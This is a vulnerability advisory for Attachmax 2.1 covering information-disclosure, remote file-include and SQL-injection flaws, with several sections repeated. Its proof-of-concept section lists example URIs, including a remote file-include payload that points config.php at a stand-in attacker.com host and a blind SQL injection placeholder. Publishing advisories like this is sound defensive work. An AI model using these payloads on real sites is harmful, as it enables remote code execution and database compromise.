Attachmax Multiple Security Vulnerabilities
BID:31207
Info
Attachmax Multiple Security Vulnerabilities
| Bugtraq ID: | 31207 |
| Class: | Unknown |
| CVE: |
CVE-2008-4206 CVE-2008-4207 CVE-2008-4205 |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 16 2008 12:00AM |
| Updated: | Jul 05 2016 10:01PM |
| Credit: | K-159 |
| Vulnerable: |
Attachmax Attachmax 2.1 |
| Not Vulnerable: | |
Discussion
Attachmax Multiple Security Vulnerabilities
Attachmax is prone to multiple security vulnerabilities, including an information-disclosure issue, a remote file-include issue, and an SQL-injection issue.
An attacker may exploit these issues to obtain sensitive information that will aid in further attacks, to include arbitrary remote files containing malicious PHP code, or to manipulate the SQL query logic to carry out unauthorized actions on the underlying database.
These issues affect Attachmax 2.1 (Dolphin); other versions may also be affected.
Attachmax is prone to multiple security vulnerabilities, including an information-disclosure issue, a remote file-include issue, and an SQL-injection issue.
An attacker may exploit these issues to obtain sensitive information that will aid in further attacks, to include arbitrary remote files containing malicious PHP code, or to manipulate the SQL query logic to carry out unauthorized actions on the underlying database.
These issues affect Attachmax 2.1 (Dolphin); other versions may also be affected.
Exploit / POC
Attachmax Multiple Security Vulnerabilities
The following example URIs are available:
http://www.example.com/[path]/info.php
http://www.example.com/[path]/config.php?rel_path=http://www.attacker.com/evil?
http://www.example.com/[path]/index.php?page=Search&category=[BlindSQL]
The following example URIs are available:
http://www.example.com/[path]/info.php
http://www.example.com/[path]/config.php?rel_path=http://www.attacker.com/evil?
http://www.example.com/[path]/index.php?page=Search&category=[BlindSQL]
Solution / Fix
Attachmax Multiple Security Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Attachmax Multiple Security Vulnerabilities
References:
References: